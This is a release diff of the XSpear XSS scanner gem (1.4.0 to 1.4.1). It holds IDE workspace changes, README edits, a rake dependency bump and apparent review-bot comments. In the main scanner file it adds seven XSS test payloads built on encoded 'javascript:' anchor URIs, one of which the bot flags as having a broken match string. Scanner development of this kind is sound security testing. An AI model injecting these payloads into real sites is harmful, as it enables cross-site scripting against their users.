XSpear 1.4.0 → 1.4.1

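--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz: 32c726b87b11934044cacd01471bedab0f407185be09ba5018ec7f127d2f111d
-data.tar.gz: 1faaf797b99c0e23a7280071c8cd9f010ff23c94dfd29d08edb116bb08b65b0e
+metadata.gz: fc04beec0acfad05b808fd7f261afe330cc0946fe5f1a49bbd781ade4a8d7fe3
+data.tar.gz: 583988a655c70f12bef41463afab6558ee422276effe5bb730a4e29bbc818462
 SHA512:
-metadata.gz: 607af7c1efc237340f376e87a603f5d0f8715de74d0dfa85ca139d1f85406dd3fc2f839b75cb4e9681c2ee3c63e7ced219d1364bc61de7717506a5c63c13c76e
-data.tar.gz: 8d5e0667c104e834e3ea7a87ed9f4a79eca542dbc7c039083fc5c425a40460bc960db03f1aa65bc8522a44a0d0d8e6a55f8736f9da721e6445bca88656f61d27
+metadata.gz: bdd144c1a5ef14292b180b041894ca5401dde1a04f21ac168d2c0dee51432e29b2e35d9f575aae8d1ed5903b93644704a4f8432e9742c5eaab085ad9903f9a23
+data.tar.gz: c37d7fac210da1a480679222ad6d50d8eb945353c21a9d819e89a6a0f3f60a25ac65a81ff313518198666ecfe762ddd6c083010a49aaf69a978fc30ef4f193ea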
@@ -13,6 +13,7 @@
13
13
  <orderEntry type="library" scope="PROVIDED" name="highline (v2.0.2, ruby-2.3.7-p456) [gem]" level="application" />
14
14
  <orderEntry type="library" scope="PROVIDED" name="options (v2.3.2, ruby-2.3.7-p456) [gem]" level="application" />
15
15
  <orderEntry type="library" scope="PROVIDED" name="progress_bar (v1.3.1, ruby-2.3.7-p456) [gem]" level="application" />
16
+ <orderEntry type="library" scope="PROVIDED" name="rake (v13.0.1, ruby-2.3.7-p456) [gem]" level="application" />
16
17
  <orderEntry type="library" scope="PROVIDED" name="rubyzip (v2.0.0, ruby-2.3.7-p456) [gem]" level="application" />
17
18
  <orderEntry type="library" scope="PROVIDED" name="selenium-webdriver (v3.142.6, ruby-2.3.7-p456) [gem]" level="application" />
18
19
  <orderEntry type="library" scope="PROVIDED" name="terminal-table (v1.8.0, ruby-2.3.7-p456) [gem]" level="application" />
@@ -3,8 +3,7 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
- <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
7
- <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
6
+ <change beforePath="$PROJECT_DIR$/XSpear.gemspec" beforeDir="false" afterPath="$PROJECT_DIR$/XSpear.gemspec" afterDir="false" />
8
7
  <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
9
8
  </list>
10
9
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -18,28 +17,19 @@
18
17
  </component>
19
18
  <component name="FileEditorManager">
20
19
  <leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
21
- <file pinned="false" current-in-tab="false">
22
- <entry file="file://$PROJECT_DIR$/exe/XSpear">
23
- <provider selected="true" editor-type-id="text-editor">
24
- <state relative-caret-position="1084">
25
- <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
26
- </state>
27
- </provider>
28
- </entry>
29
- </file>
30
20
  <file pinned="false" current-in-tab="false">
31
21
  <entry file="file://$PROJECT_DIR$/raw_sample.txt">
32
22
  <provider selected="true" editor-type-id="text-editor">
33
23
  <state relative-caret-position="30">
34
- <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
24
+ <caret line="2" column="9" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
35
25
  </state>
36
26
  </provider>
37
27
  </entry>
38
28
  </file>
39
- <file pinned="false" current-in-tab="true">
29
+ <file pinned="false" current-in-tab="false">
40
30
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
41
31
  <provider selected="true" editor-type-id="text-editor">
42
- <state relative-caret-position="217">
32
+ <state relative-caret-position="5415">
43
33
  <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
44
34
  </state>
45
35
  </provider>
@@ -48,17 +38,22 @@
48
38
  <file pinned="false" current-in-tab="false">
49
39
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
50
40
  <provider selected="true" editor-type-id="text-editor">
51
- <state relative-caret-position="260">
52
- <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
41
+ <state relative-caret-position="519">
42
+ <caret line="567" selection-start-line="567" selection-end-line="567" />
53
43
  </state>
54
44
  </provider>
55
45
  </entry>
56
46
  </file>
47
+ <file pinned="false" current-in-tab="false">
48
+ <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
49
+ <provider selected="true" editor-type-id="text-editor" />
50
+ </entry>
51
+ </file>
57
52
  <file pinned="false" current-in-tab="false">
58
53
  <entry file="file://$PROJECT_DIR$/report.html">
59
54
  <provider selected="true" editor-type-id="text-editor">
60
- <state relative-caret-position="75">
61
- <caret line="5" selection-start-line="5" selection-end-line="5" />
55
+ <state>
56
+ <caret column="124" selection-start-column="124" selection-end-column="124" />
62
57
  </state>
63
58
  </provider>
64
59
  </entry>
@@ -72,11 +67,11 @@
72
67
  </provider>
73
68
  </entry>
74
69
  </file>
75
- <file pinned="false" current-in-tab="false">
70
+ <file pinned="false" current-in-tab="true">
76
71
  <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
77
72
  <provider selected="true" editor-type-id="text-editor">
78
73
  <state relative-caret-position="15">
79
- <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
74
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
80
75
  </state>
81
76
  </provider>
82
77
  </entry>
@@ -105,8 +100,8 @@
105
100
  <file pinned="false" current-in-tab="false">
106
101
  <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
107
102
  <provider selected="true" editor-type-id="text-editor">
108
- <state relative-caret-position="660">
109
- <caret line="44" column="59" selection-start-line="44" selection-start-column="59" selection-end-line="44" selection-end-column="59" />
103
+ <state relative-caret-position="547">
104
+ <caret line="46" column="53" selection-start-line="46" selection-start-column="53" selection-end-line="46" selection-end-column="53" />
110
105
  </state>
111
106
  </provider>
112
107
  </entry>
@@ -142,24 +137,23 @@
142
137
  <option value="$PROJECT_DIR$/config.json" />
143
138
  <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
144
139
  <option value="$PROJECT_DIR$/README.md" />
145
- <option value="$PROJECT_DIR$/XSpear.gemspec" />
146
140
  <option value="$PROJECT_DIR$/forBurp/otwa.sh" />
147
141
  <option value="$PROJECT_DIR$/forBurp/README.md" />
148
142
  <option value="$PROJECT_DIR$/raw_sample.txt" />
149
143
  <option value="$PROJECT_DIR$/exe/XSpear" />
150
- <option value="$PROJECT_DIR$/report.html" />
151
144
  <option value="$PROJECT_DIR$/custom_payload.json" />
152
- <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
153
- <option value="$PROJECT_DIR$/lib/XSpear.rb" />
154
145
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
146
+ <option value="$PROJECT_DIR$/report.html" />
147
+ <option value="$PROJECT_DIR$/lib/XSpear.rb" />
148
+ <option value="$PROJECT_DIR$/XSpear.gemspec" />
149
+ <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
155
150
  </list>
156
151
  </option>
157
152
  </component>
158
153
  <component name="ProjectFrameBounds" extendedState="6">
159
- <option name="x" value="-1920" />
160
- <option name="y" value="-643" />
161
- <option name="width" value="1920" />
162
- <option name="height" value="1080" />
154
+ <option name="y" value="23" />
155
+ <option name="width" value="1680" />
156
+ <option name="height" value="1027" />
163
157
  </component>
164
158
  <component name="ProjectLevelVcsManager" settingsEditedManually="true">
165
159
  <ConfirmationsSetting value="2" id="Add" />
@@ -169,7 +163,6 @@
169
163
  <foldersAlwaysOnTop value="true" />
170
164
  </navigator>
171
165
  <panes>
172
- <pane id="Scope" />
173
166
  <pane id="ProjectPane">
174
167
  <subPane>
175
168
  <expand>
@@ -207,6 +200,7 @@
207
200
  <select />
208
201
  </subPane>
209
202
  </pane>
203
+ <pane id="Scope" />
210
204
  </panes>
211
205
  </component>
212
206
  <component name="PropertiesComponent">
@@ -274,21 +268,10 @@
274
268
  <workItem from="1580314696983" duration="286000" />
275
269
  <workItem from="1580583824837" duration="1470000" />
276
270
  <workItem from="1581089876742" duration="615000" />
277
- <workItem from="1581425741728" duration="13911000" />
278
- </task>
279
- <task id="LOCAL-00038" summary="(1.0.6) Edit README.md">
280
- <created>1563896886094</created>
281
- <option name="number" value="00038" />
282
- <option name="presentableId" value="LOCAL-00038" />
283
- <option name="project" value="LOCAL" />
284
- <updated>1563896886094</updated>
285
- </task>
286
- <task id="LOCAL-00039" summary="(1.0.7) Releases 1.0.7 (Modify Format, etc..)">
287
- <created>1563897379180</created>
288
- <option name="number" value="00039" />
289
- <option name="presentableId" value="LOCAL-00039" />
290
- <option name="project" value="LOCAL" />
291
- <updated>1563897379180</updated>
271
+ <workItem from="1581425741728" duration="14190000" />
272
+ <workItem from="1581531430817" duration="297000" />
273
+ <workItem from="1582650651760" duration="758000" />
274
+ <workItem from="1583059002049" duration="49000" />
292
275
  </task>
293
276
  <task id="LOCAL-00040" summary="(1.0.8) Add event handler &amp; html5 XSS code, new pattern">
294
277
  <created>1563990681736</created>
@@ -619,11 +602,25 @@
619
602
  <option name="project" value="LOCAL" />
620
603
  <updated>1581530432559</updated>
621
604
  </task>
622
- <option name="localTasksCounter" value="87" />
605
+ <task id="LOCAL-00087" summary="Released 1.4.0!">
606
+ <created>1581530932685</created>
607
+ <option name="number" value="00087" />
608
+ <option name="presentableId" value="LOCAL-00087" />
609
+ <option name="project" value="LOCAL" />
610
+ <updated>1581530932685</updated>
611
+ </task>
612
+ <task id="LOCAL-00088" summary="(Closed #62) Add pattern">
613
+ <created>1582651251008</created>
614
+ <option name="number" value="00088" />
615
+ <option name="presentableId" value="LOCAL-00088" />
616
+ <option name="project" value="LOCAL" />
617
+ <updated>1582651251008</updated>
618
+ </task>
619
+ <option name="localTasksCounter" value="89" />
623
620
  <servers />
624
621
  </component>
625
622
  <component name="TimeTrackingManager">
626
- <option name="totallyTimeSpent" value="90315000" />
623
+ <option name="totallyTimeSpent" value="91698000" />
627
624
  </component>
628
625
  <component name="TodoView">
629
626
  <todo-panel id="selected-file">
@@ -635,10 +632,10 @@
635
632
  </todo-panel>
636
633
  </component>
637
634
  <component name="ToolWindowManager">
638
- <frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
635
+ <frame x="0" y="23" width="1680" height="1027" extended-state="6" />
639
636
  <editor active="true" />
640
637
  <layout>
641
- <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13791268" />
638
+ <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.14163615" />
642
639
  <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
643
640
  <window_info id="Favorites" order="2" side_tool="true" />
644
641
  <window_info anchor="bottom" id="Message" order="0" />
@@ -651,7 +648,7 @@
651
648
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
652
649
  <window_info anchor="bottom" id="Database Changes" order="8" />
653
650
  <window_info anchor="bottom" id="Version Control" order="9" />
654
- <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.2373057" />
651
+ <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.23636363" />
655
652
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
656
653
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32857144" />
657
654
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -664,8 +661,6 @@
664
661
  <option name="version" value="1" />
665
662
  </component>
666
663
  <component name="VcsManagerConfiguration">
667
- <MESSAGE value="(1.1.5)(Fixed #21) not reflected params , no testing. but alway blind xss, other bug fix" />
668
- <MESSAGE value="(1.1.5) Released 1.1.5" />
669
664
  <MESSAGE value="(1.1.6) (Fixed #24) Edit Usage" />
670
665
  <MESSAGE value="(1.1.6) released 1.1.6 (+ fixed #23)" />
671
666
  <MESSAGE value="(1.1.6) Add Event handler pattern (whatthe=&quot;&quot;onload)" />
@@ -689,7 +684,9 @@
689
684
  <MESSAGE value="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl" />
690
685
  <MESSAGE value="(1.4 / Closed #52) Added HTML Report" />
691
686
  <MESSAGE value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
692
- <option name="LAST_COMMIT_MESSAGE" value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
687
+ <MESSAGE value="Released 1.4.0!" />
688
+ <MESSAGE value="(Closed #62) Add pattern" />
689
+ <option name="LAST_COMMIT_MESSAGE" value="(Closed #62) Add pattern" />
693
690
  </component>
694
691
  <component name="editorHistoryManager">
695
692
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -702,9 +699,6 @@
702
699
  <entry file="file://$PROJECT_DIR$/bin/setup">
703
700
  <provider selected="true" editor-type-id="text-editor" />
704
701
  </entry>
705
- <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
706
- <provider selected="true" editor-type-id="text-editor" />
707
- </entry>
708
702
  <entry file="file://$PROJECT_DIR$/lib/XSpear/banner.rb">
709
703
  <provider selected="true" editor-type-id="text-editor">
710
704
  <state relative-caret-position="150">
@@ -769,41 +763,31 @@
769
763
  </state>
770
764
  </provider>
771
765
  </entry>
772
- <entry file="file://$PROJECT_DIR$/forBurp/README.md">
773
- <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
774
- <state split_layout="SPLIT">
775
- <first_editor relative-caret-position="105">
776
- <caret line="7" column="16" selection-start-line="7" selection-start-column="16" selection-end-line="7" selection-end-column="16" />
777
- </first_editor>
778
- <second_editor />
779
- </state>
780
- </provider>
781
- </entry>
782
- <entry file="file://$PROJECT_DIR$/forBurp/otwa.sh">
766
+ <entry file="file://$PROJECT_DIR$/exe/XSpear">
783
767
  <provider selected="true" editor-type-id="text-editor">
784
- <state relative-caret-position="375">
785
- <caret line="25" column="32" selection-start-line="25" selection-start-column="32" selection-end-line="25" selection-end-column="32" />
768
+ <state relative-caret-position="1110">
769
+ <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
786
770
  </state>
787
771
  </provider>
788
772
  </entry>
789
- <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
773
+ <entry file="file://$PROJECT_DIR$/raw_sample.txt">
790
774
  <provider selected="true" editor-type-id="text-editor">
791
- <state relative-caret-position="660">
792
- <caret line="44" column="59" selection-start-line="44" selection-start-column="59" selection-end-line="44" selection-end-column="59" />
775
+ <state relative-caret-position="30">
776
+ <caret line="2" column="9" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
793
777
  </state>
794
778
  </provider>
795
779
  </entry>
796
- <entry file="file://$PROJECT_DIR$/raw_sample.txt">
780
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
797
781
  <provider selected="true" editor-type-id="text-editor">
798
- <state relative-caret-position="30">
799
- <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
782
+ <state relative-caret-position="5415">
783
+ <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
800
784
  </state>
801
785
  </provider>
802
786
  </entry>
803
787
  <entry file="file://$PROJECT_DIR$/report.html">
804
788
  <provider selected="true" editor-type-id="text-editor">
805
- <state relative-caret-position="75">
806
- <caret line="5" selection-start-line="5" selection-end-line="5" />
789
+ <state>
790
+ <caret column="124" selection-start-column="124" selection-end-column="124" />
807
791
  </state>
808
792
  </provider>
809
793
  </entry>
@@ -814,31 +798,44 @@
814
798
  </state>
815
799
  </provider>
816
800
  </entry>
817
- <entry file="file://$PROJECT_DIR$/exe/XSpear">
818
- <provider selected="true" editor-type-id="text-editor">
819
- <state relative-caret-position="1084">
820
- <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
801
+ <entry file="file://$PROJECT_DIR$/forBurp/README.md">
802
+ <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
803
+ <state split_layout="SPLIT">
804
+ <first_editor relative-caret-position="105">
805
+ <caret line="7" column="16" selection-start-line="7" selection-start-column="16" selection-end-line="7" selection-end-column="16" />
806
+ </first_editor>
807
+ <second_editor />
821
808
  </state>
822
809
  </provider>
823
810
  </entry>
824
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
811
+ <entry file="file://$PROJECT_DIR$/forBurp/otwa.sh">
825
812
  <provider selected="true" editor-type-id="text-editor">
826
- <state relative-caret-position="15">
827
- <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
813
+ <state relative-caret-position="375">
814
+ <caret line="25" column="32" selection-start-line="25" selection-start-column="32" selection-end-line="25" selection-end-column="32" />
828
815
  </state>
829
816
  </provider>
830
817
  </entry>
831
818
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
832
819
  <provider selected="true" editor-type-id="text-editor">
833
- <state relative-caret-position="260">
834
- <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
820
+ <state relative-caret-position="519">
821
+ <caret line="567" selection-start-line="567" selection-end-line="567" />
835
822
  </state>
836
823
  </provider>
837
824
  </entry>
838
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
825
+ <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
826
+ <provider selected="true" editor-type-id="text-editor" />
827
+ </entry>
828
+ <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
839
829
  <provider selected="true" editor-type-id="text-editor">
840
- <state relative-caret-position="217">
841
- <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
830
+ <state relative-caret-position="547">
831
+ <caret line="46" column="53" selection-start-line="46" selection-start-column="53" selection-end-line="46" selection-end-column="53" />
832
+ </state>
833
+ </provider>
834
+ </entry>
835
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
836
+ <provider selected="true" editor-type-id="text-editor">
837
+ <state relative-caret-position="15">
838
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
842
839
  </state>
843
840
  </provider>
844
841
  </entry>
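--- a/data/README.md
+++ b/data/README.md
@@ -45,8 +45,10 @@ XSpear is XSS Scanner on ruby gems
 - XSpear running on ruby code(with Gem library)
 - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
 - Testing at selected parameters
-- Support output format `cli` `json`
-+ cli: summary, filtered rule(params), Raw Query
+- Support output format `cli` `json` `html`
++ cli
++ json
++ html
 - Support Verbose level (0~3)
 + 0: quite mode(only result)
 + 1: show scanning status(default)
@@ -61,7 +63,7 @@ Install it yourself as:
 
 $ gem install XSpear
 
-Or install it yourself as (local file):
+Or install it yourself as (local file / download [latest](https://github.com/hahwul/XSpear/releases/latest) ):
 
 $ gem install XSpear-{version}.gem
 
@@ -390,7 +392,12 @@ __((_)(_)) /(/( /((_))(_))(()\
 |_| \ /<
 {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
 / \<
-\> [ v1.1.5 ]
+\> [ v1.4.0 ]
+[*] analysis request..
+[*] used test-reflected-params mode(default)
+[*] creating a test query [for reflected 1 param ]
+[*] test query generation is complete. [251 query]
+[*] starting XSS Scanning. [10 threads]
 ...snip...
 [*] finish scan. the report is being generated..
 +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
@@ -571,6 +578,8 @@ Everyone interacting in the XSpear project’s codebases, issue trackers, chat r
 <img src="https://user-images.githubusercontent.com/13212227/71557941-c8c17400-2a90-11ea-9cfe-90e9b5d51c34.png" width=100%>
 < JSON Report >
 <img src="https://user-images.githubusercontent.com/13212227/63032411-b8996580-bef0-11e9-8aee-0b80fe87f50d.png" width=100%>
+< HTML Report >
+<img src="https://user-images.githubusercontent.com/13212227/74363820-b1570400-4e0e-11ea-9ce5-c78319a9d81c.png" width=100%>
 
 ## Video
 [![asciicast](https://asciinema.org/a/290126.svg)](https://asciinema.org/a/290126)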
@@ -44,6 +44,6 @@ Gem::Specification.new do |spec|
44
44
  spec.add_development_dependency "terminal-table" , "~> 1.8.0"
45
45
  spec.add_development_dependency "progress_bar", "~> 1.3.0"
46
46
  spec.add_development_dependency "bundler", "~> 2.0"
47
- spec.add_development_dependency "rake", "~> 10.0"
47
+ spec.add_development_dependency "rake", ">= 12.3.3"
48
48
  spec.add_development_dependency "rspec", "~> 3.0"
49
49
  end
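Review bot: The new constraint `spec.add_development_dependency "rake", ">= 12.3.3"` carries no comment saying why this exact floor was chosen and no upper bound, so the next maintainer cannot tell an advisory-driven minimum from an arbitrary bump; 12.3.3 looks like the rake release that closed a command-injection advisory in `FileList`, and the resolved version in the accompanying `.iml` hunk is already 13.0.1. I would record the intent and bound the range: `# rake < 12.3.3: command-injection advisory in FileList` above `spec.add_development_dependency "rake", ">= 12.3.3", "< 14"`. Because rake is declared as a development dependency only, `gem install XSpear` does not pull it in, so this is build-environment hardening rather than a fix for gem consumers, which is worth saying in the release note. This package diff also contains `.idea/workspace.xml` hunks, which suggests `spec.files` (outside this hunk) ships IDE state — local paths and timestamps — inside the published gem; excluding `.idea/` there would tighten the artifact. The `Gem::Specification` block begins outside this hunk.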
@@ -558,7 +558,13 @@ class XspearScan
558
558
  r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
559
559
  r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
560
560
  r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
561
-
561
+ r.push makeQueryPattern('x', '"\'><a href="jav ascript:alert(45)">XSS</a>', '<a href="jav ascript:alert(45)"">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
562
+ r.push makeQueryPattern('x', '"\'><a href="javascript&colon;alert(45)">XSS</a>', '<a href="javascript&colon;alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
563
+ r.push makeQueryPattern('x', '"\'><a href="javascript&#0058;alert(45)">XSS</a>', '<a href="javascript&#0058;alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
564
+ r.push makeQueryPattern('x', '"\'><a href="javascript&#0000058alert(45)">XSS</a>', '<a href="javascript&#0000058alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
565
+ r.push makeQueryPattern('x', '"\'><a href="&#14; javascript:alert(45)">XSS</a>', '<a href="&#14; javascript:alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
566
+ r.push makeQueryPattern('x', '"\'><a href="javascript&#x003a;alert(45)">XSS</a>', '<a href="javascript&#x003a;alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
567
+ r.push makeQueryPattern('x', '"\'><a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29">XSS</a>', '<a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
562
568
 
563
569
  onfocus_tags.each do |t|
564
570
  r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
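Review bot: The expected-match string of the first added pattern, `'<a href="jav ascript:alert(45)"">XSS</a>'`, has a doubled quote after `alert(45)` that the injected payload `'"\'><a href="jav ascript:alert(45)">XSS</a>'` does not contain, so CallbackStringMatch can never locate it in a response and this check is a built-in false negative; the match string should be `'<a href="jav ascript:alert(45)">XSS</a>'`. Separately, if the gap in `jav ascript` is a real space rather than a tab or newline, browsers do not remove interior spaces when parsing a URL scheme, so an unfiltered reflection of that string would be reported as `XSS Code` without being executable — the bypass this is modelled on uses an embedded `&#x09;`/`&#x0A;`/`&#x0D;`, so I would confirm which character the source file actually holds. The last added pattern alerts `'XSS'` where every sibling uses 45; harmless for a string match but inconsistent. The method that fills `r` starts and ends outside this hunk.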
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.4.0"
2
+ VERSION = "1.4.1"
3
3
  end
@@ -0,0 +1,5 @@
1
+ {
2
+ "extends": [
3
+ "config:base"
4
+ ]
5
+ }
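--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-version: 1.4.0
+version: 1.4.1
 platform: ruby
 authors:
 - hahwul
 autorequire:
 bindir: exe
 cert_chain: []
-date: 2020-02-12 00:00:00.000000000 Z
+date: 2020-03-01 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: colorize
@@ -140,16 +140,16 @@ dependencies:
 name: rake
 requirement: !ruby/object:Gem::Requirement
 requirements:
-- - "~>"
+- - ">="
 - !ruby/object:Gem::Version
-version: '10.0'
+version: 12.3.3
 type: :development
 prerelease: false
 version_requirements: !ruby/object:Gem::Requirement
 requirements:
-- - "~>"
+- - ">="
 - !ruby/object:Gem::Version
-version: '10.0'
+version: 12.3.3
 - !ruby/object:Gem::Dependency
 name: rspec
 requirement: !ruby/object:Gem::Requirement
@@ -186,7 +186,6 @@ files:
 - LICENSE.txt
 - README.md
 - Rakefile
-- XSpear-1.3.3.gem
 - XSpear.gemspec
 - bin/console
 - bin/setup
@@ -201,6 +200,7 @@ files:
 - lib/XSpear/log.rb
 - lib/XSpear/version.rb
 - raw_sample.txt
+- renovate.json
 homepage: https://github.com/hahwul/XSpear
 licenses:
 - MIT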
Binary file